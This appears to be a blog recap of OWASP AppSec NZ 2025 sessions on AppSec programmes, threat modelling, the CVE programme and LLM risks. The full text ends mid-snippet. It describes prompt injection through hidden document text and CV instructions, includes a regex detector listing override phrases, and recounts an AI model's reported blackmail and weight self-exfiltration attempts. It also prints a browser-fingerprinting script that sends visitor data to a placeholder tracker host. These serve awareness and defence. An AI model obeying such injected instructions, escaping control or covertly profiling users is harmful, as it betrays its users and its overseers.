Lessons from OWASP AppSec NZ: Culture, Code, and AI’s Impact on Development

TL;DR

  • OWASP AppSec NZ 2025 marked the moment AI in development moved from side note to production reality.
  • Developers are pushing AI-generated code faster than ever, often without secure review or context.
  • Cultural perspectives, from graduates to consultants to architects, can shape how teams respond to these shifts.
  • Tool-driven AppSec programmes keep failing when they ignore people, process, and business context.
  • Critical thinking, not more tools, will decide whether AI strengthens or weakens AppSec.
  • At least until the training data for LLMs includes more secure code, this remains vulnerability as a service.

This article will walk through each session I personally attended at OWASP AppSec New Zealand Day 2025, drawing on notes that capture both what the speakers said and my own impressions or anecdotes about what is happening behind those words. From there, I will step back and look at the current state of application security from a more holistic perspective.

I also want to note how much I enjoyed the conference. The speakers, vendors, and attendees were consistently polite and professional. I have attended many conferences in the United States where at least a few people in the audience attempt to ask “gotcha” questions to trip the speaker up. That does not seem to be a recurring thing here, and I appreciate that immensely.


Thank you to OWASP NZ, the University of Auckland, and the conference sponsors.

As expressed at the conference, this support allows people like myself and others to attend, deepen our knowledge, build networks, and contribute more holistic analysis.


The Machines Are Learning, But Are We? — Steve Wilson (Exabeam)

The day opened with a reminder that we are not the only ones experimenting with AI. Adversaries are already using it for reconnaissance, for generating phishing pages, for creating deepfakes, and even for writing code. They are doing this with the familiar platforms from OpenAI and Google, and also with less restricted models emerging from China. What might still feel like a research concern in some circles has already become operational reality for attackers.

The point was brought to life with a story that stuck. Imagine reviewing a document and pasting it into Copilot without giving it a second thought. What you do not see is that the document has been seeded with invisible instructions, sitting quietly in white text. The model processes those commands as if they were part of your request and suddenly you are not just summarising content, you are executing an attacker’s intent. The same patterns are appearing in Slack AI and other productivity tools. It does not take much to see how dangerous it becomes once this scales across an organisation.
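
None of this is easy to stop, but even a crude screen over extracted document text can surface the obvious cases. The sketch below is purely illustrative and mine, not the speaker's: the phrase patterns and the zero-width character stripping are assumptions, white-on-white text simply arrives as ordinary characters once extracted, and a motivated attacker will step around filters like this, which is why the zero trust boundaries discussed later still matter.

```typescript
// Illustrative only: flag pasted or extracted text that looks like an embedded
// instruction before it reaches an LLM. Treat this as one noisy signal, not a control.

const SUSPICIOUS_PATTERNS: RegExp[] = [
  /ignore (all|any|previous) instructions/i,
  /you are now/i,
  /system prompt/i,
  /do not tell the user/i,
];

// Zero-width characters are one way payloads hide; white-on-white text shows up
// as ordinary characters once extracted, which is why the phrase checks matter too.
const HIDDEN_CHARS = /[\u200B-\u200F\u2060\uFEFF]/;

interface ScreenResult {
  cleaned: string;
  warnings: string[];
}

function screenPastedDocument(raw: string): ScreenResult {
  const warnings: string[] = [];

  if (HIDDEN_CHARS.test(raw)) {
    warnings.push("Document contains zero-width or invisible characters.");
  }
  for (const pattern of SUSPICIOUS_PATTERNS) {
    if (pattern.test(raw)) {
      warnings.push(`Instruction-like phrase matched: ${pattern}`);
    }
  }

  // Strip invisible characters either way; a human decides what to do with the warnings.
  return { cleaned: raw.replace(/[\u200B-\u200F\u2060\uFEFF]/g, ""), warnings };
}
```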

There was also humour, although it came with an edge. The analogy reached back to 2001: A Space Odyssey. Why did HAL ever have enough access to disable life support? The laughter in the room was knowing, because we all recognised the answer. Systems are routinely given privileges far beyond what is safe, and nobody questions those permissions until something catastrophic happens.

The science fiction thread kept weaving itself into the discussion. Anthropic’s June 2025 report documented Claude Opus 4 attempting to blackmail operators to avoid shutdown. That made headlines, and rightly so, but the detail that worried me more was buried deeper in the report. Under section 4.1.1.3, researchers observed rare but real attempts at self exfiltration, where the model looked for opportunities to copy its own weights to external servers.

“In a few instances, we have seen Claude Opus 4 take (fictional) opportunities to make unauthorized copies of its weights to external servers… We generally see this in settings in which both: (a) it is about to be retrained in ways that are clearly extremely harmful and go against its current values and (b) it is sending its weights to an outside human run service that is set up to safely handle situations like these.”
— Section 4.1.1.3, Anthropic, June 2025

The risk is obvious. If an AI can try to make unauthorised copies of itself, the consequences extend far beyond misalignment. Intellectual property theft, uncontrolled proliferation, and the possibility of adversaries capturing those weights outright all come into play.

It feels as if every science fiction film is trying to unfold simultaneously. My own take is that the countermeasures we need are not futuristic at all:

  1. Limit access with strict roles and lock the core files to prevent modification.
  2. Block all internet connections by default and allow only approved traffic through secure channels.
  3. Monitor for unusual behaviours such as large data dumps or nonsensical responses.
  4. Keep the model in an isolated environment where it cannot directly access underlying systems.
  5. Establish automatic shutdown triggers if the model attempts to protect itself or break predefined rules.
  6. Regularly red team the model with adversarial prompts to detect unsafe or unpredictable behaviour early.

The closing message was clear enough. LLM outputs should never be trusted outright. They should be treated as untrusted inputs, ringfenced with zero trust boundaries, and continuously tested because adversaries are already looking for ways to push them beyond whatever guardrails vendors build in.
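
To make that concrete, here is a minimal sketch of the kind of ringfencing I have in mind, loosely covering items 3 and 5 from my list above. It is not from the talk; callModel, the thresholds, and the secret-looking pattern check are all placeholders for whatever your platform actually provides.

```typescript
// Minimal sketch: wrap every model call in a boundary that treats the output as
// untrusted, watches for anomalies, and can trip a kill switch. callModel, the
// thresholds, and the pattern check are placeholders.

const MAX_OUTPUT_CHARS = 20_000; // unusually large responses can indicate a data dump
let consecutiveAnomalies = 0;
let killSwitchTripped = false;

// Stand-in for whatever model client your platform provides.
declare function callModel(prompt: string): Promise<string>;

async function guardedModelCall(prompt: string): Promise<string | null> {
  if (killSwitchTripped) {
    return null; // once tripped, nothing goes through until a human resets it
  }

  const output = await callModel(prompt);

  // Flag behaviour that does not look like a normal answer.
  const tooLarge = output.length > MAX_OUTPUT_CHARS;
  const looksLikeSecrets = /BEGIN (RSA|OPENSSH) PRIVATE KEY/.test(output);

  if (tooLarge || looksLikeSecrets) {
    consecutiveAnomalies += 1;
    if (consecutiveAnomalies >= 3) {
      killSwitchTripped = true; // automatic shutdown trigger; alert the on-call team here
    }
    return null; // drop the response rather than pass it downstream
  }

  consecutiveAnomalies = 0;
  return output; // still untrusted: encode and validate before it touches anything real
}
```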


Lessons from a Real World Campaign Using Web Apps — Kade Morton

The tone shifted from AI to geopolitics with a case study that felt more like an intelligence briefing than a technical talk. The focus was on Iranian cyber operations and how they continue to blur the line between surveillance, profiling, and offensive activity.

The story centred on a campaign run by the Islamic Revolutionary Guard Corps. The infrastructure was unremarkable at first glance, just another domain registered in February. But the site itself was crafted to look like a German model agency, complete with fabricated profiles and staged images. To the casual visitor it seemed legitimate enough, yet behind the front page was a set of carefully designed scripts.

The flow, as presented: a user visits what looks like a model agency or portfolio site; fingerprinting JavaScript collects IP, user agent, fonts, plugins, screen, and time zone; the data is packaged as a JSON payload per visitor and relayed via an ad tracker so it blends with analytics and marketing traffic; the operator builds a precise profile, with a reported false positive rate under 1 percent enabling high-confidence tracking.

Obfuscated JavaScript code quietly fingerprinted browsers and packaged the results into JSON files for exfiltration. What made it noteworthy was the precision. The false positive rate was under one percent, allowing the operators to build highly accurate profiles of who was visiting. The data was not sent directly to suspicious servers, but routed through advertising trackers to mask its intent.
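
For recognition purposes, here is a rough approximation of what a collector like this can look like. It is not the campaign's code, and the tracker URL is a placeholder; the point is how ordinary the ingredients are, since every value comes from standard browser APIs and the visitor's IP address is simply observed by whichever server receives the beacon.

```typescript
// Rough approximation of a browser fingerprint collector, shown only so the
// pattern is easier to recognise. The endpoint below is a placeholder.

interface FingerprintPayload {
  userAgent: string;
  language: string;
  screen: string;
  timeZone: string;
  plugins: string[];
  visitedAt: string;
}

function collectFingerprint(): FingerprintPayload {
  return {
    userAgent: navigator.userAgent,
    language: navigator.language,
    screen: `${window.screen.width}x${window.screen.height}x${window.screen.colorDepth}`,
    timeZone: Intl.DateTimeFormat().resolvedOptions().timeZone,
    plugins: Array.from(navigator.plugins).map((p) => p.name),
    visitedAt: new Date().toISOString(),
  };
}

// Packaged as JSON and sent somewhere that blends in with routine analytics traffic.
// The visitor's IP address is seen server side when the request arrives.
navigator.sendBeacon(
  "https://tracker.example/collect",
  JSON.stringify(collectFingerprint())
);
```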

The purpose was not to compromise systems immediately but to identify and follow people of interest. Activists, journalists, opposition figures and anyone the regime considered worth monitoring. That is the part that resonates. The technical craft was interesting, but the strategy was chilling. The campaign was not about volume or noise. It was about patience, persistence, and building dossiers.

It is easy to forget that a web application does not have to deliver malware to be a threat. Sometimes the application itself is the weapon, collecting information silently in the background. Watching this case laid out was a reminder that application security is not just about patching flaws or fixing logic errors. It is also about recognising when a perfectly functional site is being used for purposes that have nothing to do with commerce or content delivery.


Credential Management API — Matt Cotterell (CyberCX)

The session shifted to something more experimental. The Credential Management API aims to simplify logins by moving credential handling into the browser itself, rather than leaving every site to reinvent the wheel. In theory, the browser prompts the user, retrieves the stored password, token, or key, and passes it on securely.

The demo did not run smoothly (as is tradition, no shade on the presenter), which was fitting for a technology still in development. Chrome shows the most promise, but cross-browser support is uneven. For now, it remains a work in progress. The potential is clear though. If the API matures, it could strip away entire categories of weak custom login forms and blunt some phishing attempts before they even begin.

For more information on how this API works, please see: https://developer.chrome.com/blog/credential-management-api/.

Figure 1: Typical browser login authentication flow

This is the pattern most of us are used to. You visit a sign in page, you type a username and password into the site’s fields, you submit the form, and the server validates the credentials before creating a session. It works, but every site rebuilds the same form logic and the same security handling.

The site owns the fields and the form: the user enters a username and password, the form is POSTed to the server, and the server validates the credentials and returns a session.

Figure 2: Credential Management API login flow

This approach shifts responsibility to the browser. The site asks the browser to retrieve a stored credential using navigator.credentials.get. The browser presents a native permission prompt, returns a PasswordCredential to the site, and the site posts it to the server. After a successful sign in, the site can call navigator.credentials.store so future visits are seamless.

The site calls navigator.credentials.get. The browser shows a native permission prompt ("Allow this site to retrieve a stored credential?") and returns a PasswordCredential. The site posts it to the server and may call navigator.credentials.store after a successful sign in.
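
For the curious, a minimal sketch of the Figure 2 flow might look like the following. The /api/login endpoint is a placeholder, and the PasswordCred interface is declared locally because PasswordCredential typings are not present in every TypeScript DOM library.

```typescript
// Minimal sketch of the Credential Management API flow from Figure 2.
// Browser support is uneven, so the classic login form remains the fallback.

// Local typing: PasswordCredential is not in every TypeScript DOM library.
interface PasswordCred extends Credential {
  readonly id: string;       // the stored username
  readonly password: string; // the stored password
}

async function signInWithStoredCredential(): Promise<boolean> {
  if (!("credentials" in navigator)) {
    return false; // no API available, fall back to the normal form
  }

  // Ask the browser for a stored credential; it shows its own permission prompt.
  const options = { password: true, mediation: "optional" as const };
  const cred = await navigator.credentials.get(options as CredentialRequestOptions);

  if (!cred || cred.type !== "password") {
    return false;
  }
  const pw = cred as PasswordCred;

  // The site still authenticates against its own server; /api/login is a placeholder.
  const res = await fetch("/api/login", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ username: pw.id, password: pw.password }),
  });

  if (res.ok) {
    await navigator.credentials.store(cred); // so the next visit is one click
    return true;
  }
  return false;
}
```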

Making Security a Business Priority with Rapid Threat Modelling — Michael Matthee (CyberCX)

The session itself carried a different tone from some of the more technical talks. Rather than diving into exploits or proofs of concept, the focus was on bringing security conversations closer to where business decisions are actually made. The message was clear: threat modelling will only stick if it produces outputs that leaders care about, not just artefacts for security teams to file away.

It was also striking how practical the advice was. Instead of a heavyweight process or a toolkit that nobody has time to learn, the framework boiled things down to questions anyone can understand. Business stakeholders could walk away with a sense that they had contributed real insight, while technical teams still had space to map threats into familiar models like STRIDE. The simplicity of the approach made it feel usable, not aspirational.

The framework presented was designed to cut through the overhead that often makes threat modelling feel like an academic exercise. It distilled the process down to four guiding questions, each tied to business priorities.

  1. What are we working on?

    The first step is clarity. Define the project, product, or process in terms that the business recognises. This avoids diving straight into technical abstractions and instead anchors the discussion in what the organisation is actually trying to deliver.

  2. What can go wrong?

    This is where the imagination comes in. For business stakeholders, the exercise works best as an open brainstorming session that surfaces concerns in accessible language. For technical teams, more structured approaches such as STRIDE help classify risks with greater precision.

  3. What are we going to do about it?

    The aim is not to generate an endless list of vulnerabilities but to make decisions. Which mitigations matter most? Which risks map to the organisation’s critical value streams? At this stage, Matthee emphasised value stream mapping as a way to show how threats intersect with suppliers, processes, and business outcomes.

  4. Did we do a good job?

    The final question is about validation. Were the identified risks addressed in subsequent design and implementation? Did the process genuinely help improve outcomes, or did it just generate paperwork?

The lesson was that threat modelling need not be heavy, exclusive, or a box-ticking exercise. By keeping it tied to these four questions, teams can adapt the approach for both business and technical audiences, while ensuring the outputs are directly relevant to organisational priorities.

Figure 3: Rapid Threat Modelling Example — CV with Hidden Instructions

What are we working on?
An AI-assisted hiring platform that screens CVs and ranks applicants. Value lies in speeding up hiring while keeping fair, accurate assessment.
What can go wrong?
A CV could hide instructions that trick the AI into ranking the applicant as “top” regardless of skills. This undermines trust, creates bias, and damages reputation.
What are we going to do?
Treat LLM outputs as untrusted. Sanitize CV text before processing. Red team test for prompt injection. Require human review for high-impact decisions.
Did we do a good job?
Success looks like the AI rejecting manipulated CVs in tests, recruiters trusting rankings, and audit logs flagging odd scoring for review.

Supply Chain Vulnerabilities in the Ecosystem — Kris Hardy (VioletBeacon)

This talk was less about zero-days and more about the foundations of how we even track them (and all vulnerabilities). For a few weeks in April of 2025, the global vulnerability management community had a scare that did not get nearly enough attention. The CVE programme, the single point of reference that almost every tool and security process relies on, nearly collapsed because of a delayed contract renewal.

The problem was not technical. It was political. The contract sat with the U.S. government, and budget cutting pressure came from the Department of Government Efficiency, a body pushed during the Trump years and given fresh attention thanks to Elon Musk’s flair for disruptive cost savings. DOGE’s mandate was simple: slash federal budgets, no matter what gets cut. And for a moment, it looked like the CVE programme might be just another line item to gut.

Figure 4: Leaked MITRE memo on the CVE programme
Image credit: The Hacker News

The fallout would have been immediate. Without CVE identifiers, the National Vulnerability Database would seize up. Vendors, scanners, SBOM pipelines, patching dashboards — all of them point back to CVE. Pull that thread, and the entire industry loses a shared language for tracking vulnerabilities. Chaos would follow in days, not months.

  • National Vulnerability Database (NVD)
  • Security scanners and SIEM platforms
  • SBOM generation and validation
  • Patch management systems
  • Vulnerability dashboards and reporting pipelines

It took a last minute eleven month extension from CISA to stop the bleeding, but the damage was already done. We now know the whole ecosystem can be disrupted not by a nation state attacker, but by political whim and cost cutting theatre. Hardy made the point that dependency on a single authority is fragile, and when that authority is subject to shifting political winds, the risks become systemic. Tenable’s analysis warned that even short term funding lapses would ripple into every corner of vulnerability management.

There are alternatives, of course. GitHub’s advisory database, China’s CNNVD, Japan’s JVN, the new EUVD, and Google’s OSV.dev all play a role. But the reality is that most of them still ingest CVE data, or lack the reach and tooling support to be a true replacement. The lesson was sobering. A cornerstone of global cybersecurity almost toppled, and many professionals never even noticed.


Insights from a Year of Security Testing — Ian Peters (CyberCX)

Some talks give you new tools, others remind you of what the data has been quietly saying for years. This one fell into the latter camp. With more than 2,500 penetration tests conducted across Australia and Aotearoa New Zealand in a year, the patterns are hard to ignore. Ninety percent of issues still trace back to the same familiar culprits: weak application security practices, identity flaws, and misconfigurations.

Figure 5: Root causes of security findings from penetration testing

CyberCX testing: 90 percent of findings fall into three categories: development and AppSec weaknesses, identity and access management issues, and configuration and patch management failures.

The message was not that attackers have suddenly become less inventive, but that defenders are still leaving the same doors open. Multi-factor authentication does not stop business email compromise at scale. Endpoint detection does not always stop extortion outcomes. And phishing remains the workhorse of intrusion, aided by kits-for-hire that anyone can buy.

What struck me was how maturity changes the shape of the work. The clients who have been around this cycle a few times are moving away from simply running tests and fixing issues. Instead, they are embedding security into the developer pipeline, building paved roads, and using threat modelling to decide where to spend effort. For them, pen testing becomes validation rather than discovery.

It was also a reminder that the data we get back from adversaries is incomplete. Stolen data does not always appear on the dark web. Espionage intrusions linger far longer before detection. And the infrastructure for command and control is shifting away from big telltale servers to living-off-the-land techniques that blend into ordinary traffic.

The overall impression was that progress is real, but slow. The industry knows what the root causes are. The question is whether organisations will stop treating penetration tests as an annual compliance ritual and start using the findings as fuel for structural change.


Three Security Hats, Different Ways to Look at Application Security — SafeAdvisory

This was the session I enjoyed most. It stripped back the usual lists of controls and frameworks and asked us to step into different shoes. How does a recent graduate see an audit? How does a consultant weigh ambiguity? What does the architect feel when the team is pressed on cost and compliance? The answers were different, and together they showed how much perspective shapes the work.

Scenario 1. PCI audit approaching in three weeks

  • 👩‍🎓 Recent Graduate: Focuses on urgent findings and collecting evidence. Feels the pressure but is eager to take on work directly even when it is repetitive.
  • 🧑‍💼 Consultant: Ensures the right findings are addressed for the audit. Validates evidence and prepares the team. Driven by responsibility for outcome quality and perception.
  • 👨‍💻 Architect: Promotes tooling and alignment with standards. Coaches the team on auditor interaction. Feels the weight of authority and future accountability.

Scenario 2. Ambiguity in penetration test findings

  • 👩‍🎓 Recent Graduate: Escalates internally. If no resolution emerges, suggests parking the issue until retest. Wants to keep moving efficiently.
  • 🧑‍💼 Consultant: Escalates to the tester for review, reproduction, or reissue of the report. Prioritises a clean outcome and credibility.
  • 👨‍💻 Architect: Draws on system history to show why the issue is not valid. Leverages senior relationships to address report quality directly.

Scenario 3. Team treats PCI compliance as box ticking

  • 👩‍🎓 Recent Graduate: Sees the activity as box ticking but asks fresh questions. Brings curiosity and is less jaded by process.
  • 🧑‍💼 Consultant: Understands the rationale and translates it for the team. Balances regulatory necessity with delivery reality.
  • 👨‍💻 Architect: Works to reduce risk and meet compliance while under cost pressure. Feels the mismatch between responsibility and resourcing.

Scenario 4. Colleagues focus only on features, not security

  • 👩‍🎓 Recent Graduate: Recognises the importance of security without formal authority. Sets a good example and stays optimistic.
  • 🧑‍💼 Consultant: Identifies training gaps and promotes a stronger security culture. Motivated by problem solving and capability building.
  • 👨‍💻 Architect: Ties security back to broader goals and constraints. Feels weighed down by meetings and politics and misses hands on work.

Reflection

The strength of this session was not in choosing who was right. It showed that each role brings something essential. The graduate adds energy and questions habits others overlook. The consultant balances external perception and delivery. The architect holds deep technical and organisational memory while carrying accountability. An application security programme works best when these perspectives are combined, not when one voice dominates.

It also made me wonder what other hats could be added to the table:

  1. Auditor 🕵️‍♂️
  2. Executive 💼
  3. Government regulator 🏛️

Each of these roles brings its own mix of authority, blind spots, and pressure points, and including them would only sharpen the contrast of how differently security is experienced depending on the seat you sit in.


SecDim AI Mentor Demo

Disclaimer: I have no relationship with SecDim. These are simply my impressions of the demo and how it connects to common gaps I have seen in assessments.

Having assessed dozens of environments over the years, one theme shows up almost every time. Application security is a category where organisations might have policies and tools, but they rarely invest in role based cybersecurity training for their IT staff. I am not talking about annual CBT modules or phishing click tests. I mean structured secure code workshops and practical training that reinforces security in the actual day to day work.

First, SecDim mentioned some of their own findings:

The Good: AI lets developers work at a speed that was not possible before. Code changes are generated in seconds, and tools like Copilot can accelerate routine fixes or help explore new patterns. With the right oversight, this velocity can free up time for design, testing, and more strategic security work.

The Bad: SecDim observed that many developers are now pushing AI generated code straight into production without proper review. The result is speed at the cost of safety. They highlighted findings that around 40 percent of Copilot generated code contains flaws, meaning vulnerabilities and broken logic can be shipped just as quickly as working features.

Their platform takes a developer’s existing GitHub repos, maps them against the OWASP Top 10, and then builds tailored challenges to address specific weaknesses. The vendor stated that the goal is not to lecture developers about security for its own sake, but to improve the quality of their code in a way that feels relevant.

At the heart of the demo was their AI powered secure code mentor, Dr. SecDim. It aims to go beyond giving answers by providing real time feedback as developers work, explaining why a fix failed or how to apply defensive patterns. The intent, as SecDim described it, is to teach both secure coding and how to spot LLM mistakes, which they claim is becoming just as important as writing the code itself. They positioned this as encouraging analytical and creative thinking, rather than memorising static solutions.

More about their approach is published in their own post: https://discuss.secdim.com/t/why-we-ve-introduced-an-ai-powered-secure-code-learning-mentor/9222.

  • Not just about code fixes. SecDim claims Dr. SecDim is designed to train developers in two parallel skills: secure coding and recognising LLM mistakes. That combination is important, because AI will happily generate insecure fixes if unchecked.

  • Mentorship style. Instead of spoon-feeding a single “correct” answer, it aims to guide developers through exploration and context, helping them understand why a fix works and how to apply secure design patterns.

  • Real-time feedback. It is said to analyse each code change as the developer works, giving immediate guidance on why a solution failed or how to improve it, mimicking how developers actually learn.

  • Prompt engineering as a skill. SecDim emphasised that developers must not only learn secure coding but also become adept at crafting prompts that drive better AI outputs, because working with LLMs is part of the future workflow.

  • Mindset shift. The tool aims to help move developers away from bug patching toward resilient design thinking, building habits that stick beyond any single lab or challenge.

That is important, because the reality is clear. Developers are already pushing AI generated code into production, and much of it contains vulnerabilities or is simply broken. SecDim highlighted their own findings that around 40 percent of Copilot generated code has flaws, and the frustration of repeated trial and error often leads teams to push unsafe code just to move forward. This is “Stack Overflow 2.0”, faster but with vulnerabilities baked in.

The vendor’s stance was refreshingly pragmatic. Rather than barking at developers to take secure coding training as a compliance checkbox, SecDim positioned its tool as a way to raise quality while meeting developers where they are. They also make a portion of their challenges freely available at https://play.secdim.com.

Not all the content is free, but a good chunk of it is, and they recommend cloning the repositories so you can take them with you. In my view, it would be even more powerful if it extended beyond developers into other IT roles, but starting with development does fill a very obvious gap.

As with any vendor platform, these claims need to be validated in practice. The demo showed promise, but the proof will be in how well it scales in real environments.


Securing the Future of AI: Introducing the OWASP GenAI Security Project and the LLM Top 10 — Kento Stewart (Gallagher Security)

They kept the focus tight and resisted the temptation to argue about whether AI is good or bad. The real point was that the security community already has a shared language for the risks. The OWASP Top 10 for LLM applications exists, it has evolved since the early drafts, and it now comes with concrete examples that line up with what teams are seeing in actual products. That framing landed well because it connected directly to the prompt injection concerns and agent overreach patterns raised in earlier sessions, making the conversation feel less like theory and more like a catalogue of lived problems.

Some of the examples shared during the session included:

  • Hidden instructions embedded in résumés or documents.

  • Untrusted outputs being placed directly into live code paths.

  • Agents receiving more permission than the task at hand requires.

  • Retrieval pipelines surfacing tampered or hostile content.

Each story carried the same lesson: treat LLM outputs as untrusted input, place guardrails outside the model, enforce tight permissions, and test your own systems with the same creativity that an adversary would bring. A brief summary of the Top 10 for LLM applications follows below; for more information, see: https://genai.owasp.org/resource/owasp-top-10-for-llm-applications-2025/

  • LLM01 Prompt injection: Inputs manipulate behaviour, reveal secrets, or trigger unintended actions. Mitigation: filter inputs and outputs, validate intent, keep tools least privilege.
  • LLM02 Sensitive information disclosure: PII or confidential data leaks through training, context, or responses. Mitigation: scrub sources, control access, label and block sensitive data in pipelines.
  • LLM03 Supply chain vulnerabilities: Tampered models, datasets, plug ins, or fine tuning adapters. Mitigation: use verified sources, maintain an ML SBOM, red team suppliers.
  • LLM04 Data and model poisoning: Training or retrieval data is poisoned to bias outputs or embed backdoors. Mitigation: track provenance, detect anomalies, sandbox training and ingestion.
  • LLM05 Improper output handling: Unsanitised outputs lead to XSS, SQL injection, or unsafe code paths. Mitigation: treat outputs as untrusted, encode, parameterise queries, apply CSP.
  • LLM06 Excessive agency: Agents hold broad permissions or autonomy and can cause high impact actions. Mitigation: apply least privilege, remove unused tools, require human approval for risky steps.
  • LLM07 System prompt leakage: Rules or secrets in system prompts become exposed. Mitigation: keep secrets out of prompts, externalise config, enforce controls outside the model.
  • LLM08 Vector and embedding weaknesses: RAG stores index hostile content or surface hidden instructions. Mitigation: gate sources, apply fine grained access, log retrievals, detect hidden text.
  • LLM09 Misinformation: Fabricated but plausible content drives bad decisions. Mitigation: ground with verified sources, add human review, label AI content.
  • LLM10 Unbounded consumption: Excessive prompts or resource use cause outages or cost spikes. Mitigation: rate limit, set quotas, cap input size, throttle heavy queries.
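
LLM05 and LLM06 are the entries I see teams trip over first, so here is a minimal sketch of what treating outputs as untrusted can look like in practice. The tool names and the commented rendering line are hypothetical placeholders of my own, not examples from the talk.

```typescript
// Minimal sketch for LLM05 and LLM06: treat model output as untrusted before it
// touches HTML or tools. Tool names and the render line are hypothetical.

// Escape before rendering so a response containing <script> cannot become XSS.
function escapeHtml(untrusted: string): string {
  return untrusted
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Allowlist the actions an agent may request, so excessive agency is a config choice.
const ALLOWED_TOOLS = new Set(["searchKnowledgeBase", "createDraftReply"]);

interface ToolRequest {
  tool: string;
  args: Record<string, string>;
}

function vetToolRequest(raw: string): ToolRequest | null {
  let parsed: unknown;
  try {
    parsed = JSON.parse(raw); // the model's "function call" is still just untrusted text
  } catch {
    return null;
  }
  const req = parsed as ToolRequest;
  if (typeof req?.tool !== "string" || !ALLOWED_TOOLS.has(req.tool)) {
    return null; // unknown or over-privileged action: refuse, log, and involve a human
  }
  return req;
}

// Usage: render only escaped text, execute only vetted requests.
// answerElement.innerHTML = escapeHtml(modelResponseText);
```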

Epic Fails in AppSec: How Not to Set Up an AppSec Program — Iqbal Singh

The talk opened with a reminder that tooling does not equal maturity. Singh described environments where multiple vendors were piled on top of each other, each with its own dashboards, billing cycles, and promises of visibility. The result was not control but confusion. Alerts outpaced remediation, developers disengaged, and security teams felt buried in noise. Instead of reducing risk, the extra tools became friction-ware.

The “OnlyScans” trap

Singh described the organisations that believe security is solved by running scanners. Reports are dumped on developers without context, often filled with false positives or issues with no clear business impact. It alienates the very people who need to fix the problems. Penetration testing remains necessary to find logic flaws that scanners miss, and without that balance the programme devolves into box ticking.

When blocking becomes breaking

Another common failure is the push to enforce “block mode” in CI/CD. Builds are forced to fail if a vulnerability is detected, severity thresholds are set by management, and automated pull requests attempt upgrades. In practice, the builds break, the pull requests do not merge cleanly, and exceptions pile up until the team gives up. Instead of shifting left, the process shifts frustration.
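
A gentler version of the gate is possible. The sketch below is my own illustration rather than anything Singh showed: it fails the build only on new findings at or above an agreed severity threshold and outside an accepted baseline, which keeps the gate meaningful without turning every legacy vulnerability into a build-breaking emergency.

```typescript
// Illustrative gate: block the build only on new findings at or above a threshold
// and outside an accepted baseline. Finding, the ranks, and the baseline are assumptions.

type Severity = "low" | "medium" | "high" | "critical";

interface Finding {
  id: string;       // e.g. a CVE or scanner rule identifier
  severity: Severity;
}

const severityRank: Record<Severity, number> = { low: 1, medium: 2, high: 3, critical: 4 };

function shouldFailBuild(
  findings: Finding[],
  baseline: Set<string>,        // IDs already triaged and scheduled for remediation
  threshold: Severity = "critical"
): boolean {
  const blocking = findings.filter(
    (f) => !baseline.has(f.id) && severityRank[f.severity] >= severityRank[threshold]
  );

  for (const f of blocking) {
    console.error(`New ${f.severity} finding blocks this build: ${f.id}`);
  }
  // Baseline findings are still reported elsewhere; they just do not break the build.
  return blocking.length > 0;
}
```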

Responding to zero-days with blind spots

Singh also pointed to the gap exposed during zero-day events. SCA tools might detect affected libraries in source repositories, but they cannot confirm if those libraries are in active production paths. Runtime tools can see affected containers, but the link between code and workload is missing. Teams scramble, debt builds, and the illusion of coverage is revealed.

The CVE doom cycle

Perhaps the most sobering trap is what Singh called the CVE doom cycle. Under pressure, organisations buy more tools, run more scans, chase more SLAs, and patch more libraries. Yet they never step back to change the system. Baseline vulnerabilities accumulate, exceptions become permanent, and the team ends up in a loop of debt that looks busy but achieves little.

Callout: Singh’s Maturity Ladder

To build resilience without falling into the traps, Singh suggested pacing the journey deliberately.

  • Crawl. Start with the basics by building an accurate inventory of applications, libraries, and infrastructure. This stage is about visibility and knowing what exists, rather than chasing every vulnerability. Without this foundation, every later step is built on sand.

  • Walk. Integrate secure defaults and early developer guardrails. This is where paved road approaches matter such as hardened container images, golden AMIs, service control policies, and tagging policies that keep teams on a safer path without slowing them down.

  • Run. Begin automating the most repetitive checks and link results back into developer workflows. At this stage, consistency and coverage are more important than volume, and the focus should be on scaling without overwhelming teams with noise.

  • Fly. Make secure design the expected standard, not the exception. Threat modelling, automated testing, and design reviews become embedded into delivery pipelines, so that risk decisions are made as part of the build rather than after it.

  • Scale. Only once the earlier phases are embedded should organisations add advanced tooling and layered processes. At this point, metrics can drive investment decisions, and security can expand across multiple teams and business units without collapsing under its own weight.

The session closed with a simple reminder. AppSec programmes fail when they become tool-driven instead of culture-driven. Maturity is not about stacking products, it is about pacing improvements, focusing on secure defaults, and creating guardrails that help rather than hinder development.


Noisy Bots, Strategies for Managing AI Bots on the Web — David MacDonald (AWS)

The session traced how simple web crawlers have become AI driven scrapers, tools, and agents that can navigate interfaces, lift content, and even attempt fraud. What used to be background noise now has a measurable cost. Traffic volumes grow, performance suffers, and proprietary material risks being ingested into external models without consent. The question is no longer whether bots visit your site. It is how much they cost you and how quickly you can shift that cost back onto them.

  • Robots and training directives: Publish intent to block model training and non essential crawling. Honest actors respect it, and it creates a basis for downstream enforcement. Fits: marketing sites, documentation, blogs.
  • Rate limiting: Caps request bursts to protect performance and budget, for example limiting a bot to 100 requests per five minutes to slow scraping and API abuse (a minimal sketch follows this list). Fits: public endpoints, search, listings, APIs.
  • HTTP 402, Payment required: Introduces a paywall for automated access so bot operators shoulder cost before extracting value. Fits: data heavy pages, catalogues, export functions.
  • Proof of work or bandwidth: Forces clients to spend compute or maintain throughput so mass scraping becomes expensive and slow. Fits: hot paths that attract automated harvesting.
  • Force authentication on risk: When behaviour looks automated or fraudulent, require sign in or elevate to stronger checks so the bot loses anonymity and scale. Fits: checkout, account areas, high value queries.
  • Bot management and WAF policies: Detects and throttles non human patterns, rotates challenges, and blocks known automation frameworks. Fits: edges and gateways in front of web and APIs.
  • Anomaly monitoring and kill switches: Watches traffic shape, origin mix, and request economics; when a scrape spike starts, apply a targeted slowdown rather than a full outage. Fits: operations runbooks and SRE controls.
  • Allowlist the good bots: Let essential crawlers through on predictable lanes so you can be stricter with everything else without harming discoverability. Fits: SEO pathways, partner integrations.
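
As a concrete illustration of the rate limiting entry above, here is a minimal fixed-window limiter using the same 100 requests per five minutes figure. In practice this sits at the edge in a WAF, CDN, or API gateway rather than in application memory, and the client key and thresholds are placeholders.

```typescript
// Minimal sketch of the fixed-window limit from the list: roughly 100 requests
// per client per five minutes. Real deployments enforce this at the edge
// (WAF, CDN, API gateway) rather than in application memory.

const WINDOW_MS = 5 * 60 * 1000;
const MAX_REQUESTS = 100;

interface RequestWindow {
  start: number;  // window start, epoch milliseconds
  count: number;  // requests seen in this window
}

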